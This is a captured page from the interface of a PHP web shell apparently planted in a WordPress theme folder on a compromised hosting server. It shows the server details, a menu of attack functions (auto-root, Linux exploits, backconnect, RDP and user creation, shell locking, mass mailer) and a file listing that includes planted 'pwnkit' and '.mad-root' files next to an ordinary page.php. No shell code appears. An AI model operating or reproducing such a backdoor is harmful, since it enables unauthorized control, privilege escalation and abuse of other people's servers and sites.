Linux webm006.cluster131.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.131.20.6 | : 216.73.217.120
Cant Read [ /etc/named.conf ]
8.0.30
neuschi
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
neuschi /
www /
wp-content /
themes /
andre-lite /
[ HOME SHELL ]
Name
Size
Permission
Action
genericons
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
.htaccess
127
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
404.php
432
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
animate.css
37.64
KB
-rw-r--r--
archive.php
755
B
-rw-r--r--
comments.php
1.92
KB
-rw-r--r--
content.php
519
B
-rw-r--r--
footer.php
903
B
-rw-r--r--
functions.php
4.6
KB
-rw-r--r--
header.php
2.01
KB
-rw-r--r--
index.php
588
B
-rw-r--r--
page.php
922
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
3.07
KB
-rw-r--r--
screenshot.png
382.22
KB
-rw-r--r--
search.php
792
B
-rw-r--r--
sidebar.php
212
B
-rw-r--r--
single.php
1.36
KB
-rw-r--r--
style-editor.css
3.82
KB
-rw-r--r--
style-rtl.css
40.86
KB
-rw-r--r--
style.css
40.75
KB
-rw-r--r--
template-home-page.php
435
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : page.php
<?php /** * The template for displaying all pages. * * @package andre */ get_header(); ?> <div id="wrapper"> <div class="innerwrapper"> <div id="contentwrapper" class="content"> <?php if ( have_posts() ) : while ( have_posts() ) : the_post(); ?> <div class="post" id="post-<?php the_ID(); ?>"> <div class="entry"> <h1 class="entry-title"><?php the_title(); ?></h1> <?php the_content(); ?> <?php edit_post_link(); ?> <?php wp_link_pages( array( 'before' => '<p><strong>' . esc_html__( 'Pages:', 'andre-lite' ) . '</strong> ', 'after' => '</p>', 'next_or_number' => 'number', ) ); ?> <?php comments_template(); ?> </div> </div> <?php endwhile; endif; ?> </div> </div> </div> <?php get_footer(); ?>
Close